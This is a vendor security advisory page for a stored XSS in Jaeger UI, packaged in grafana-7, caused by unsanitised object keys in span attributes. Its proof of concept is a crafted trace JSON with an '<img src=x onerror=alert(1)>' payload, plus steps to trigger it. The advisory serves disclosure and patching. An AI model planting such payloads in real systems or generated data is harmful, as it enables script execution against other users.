DirectorySecurity Advisories
Sign In
Security Advisories

CGA-r6hh-jjvw-248x

Published

Last updated

https://images.chainguard.dev/security/CGA-r6hh-jjvw-248x
Package

grafana-7

Latest Update
Affected
Aliases
  • GHSA-2w8w-qhg4-f78j

Severity

6.5

Medium

CVSS V3

Summary

A stored XSS in jaeger UI might allow an attacker who controls a trace to perform arbitrary jaeger queries

Description

Related UI vulnerability advisory: https://github.com/jaegertracing/jaeger-ui/security/advisories/GHSA-vv24-rm95-q56r

Summary

Jaeger UI is using the json-markup dependency to display span attributes and resources. This dependency is not sanitising keys of an object though, thus the KeyValuesTable is vulnerable to XSS.

Details

The vulnerable line is here: https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49

PoC

  1. Start a Jaeger UI
  2. Save the following trace as a file:
{
    "data": [
        {
            "traceID": "076ef819cc06c45a",
            "spans": [
                {
                    "traceID": "076ef819cc06c45a",
                    "spanID": "076ef819cc06c45a",
                    "flags": 1,
                    "operationName": "and open 'attributes'",
                    "references": [],
                    "startTime": 1678196149232010,
                    "duration": 13485,
                    "tags": [
                        {
                            "key": "sampler.type",
                            "type": "string",
                            "value": "{\"<img src=x onerror=alert(1)>\":\"test\"}"
                        }
                    ],
                    "logs": [],
                    "processID": "p1",
                    "warnings": null
                }
            ],
            "processes": {
                "p1": {
                    "serviceName": "click here",
                    "tags": [
                    ]
                }
            },
            "warnings": null
        }
    ],
    "total": 0,
    "limit": 0,
    "offset": 0,
    "errors": null
}
  1. Upload that trace to Jaeger UI in order to visualise it.
  2. Open the trace, open it's span's attributes.
  3. XSS should be fired.

Impact

This is a XSS on Jaeger UI. XSS can be used to run JavaScript.

References

Updates

Safe Source for Open Sourceâ„¢
Media KitContact Us
© 2024 Chainguard. All Rights Reserved.
Private PolicyTerms of Use

Product

Chainguard Images

Why Chainguard

Container Image SecurityVulnerability RemediationCompliance and Risk MitigationSoftware Supply Chain SecurityAI/ML Security

Customers

Customer StoriesChainguard Love

Company

About UsPricingOpen SourceCareersNewsroomLegal

Resources

Unchained BlogEventsTrust CenterDocumentation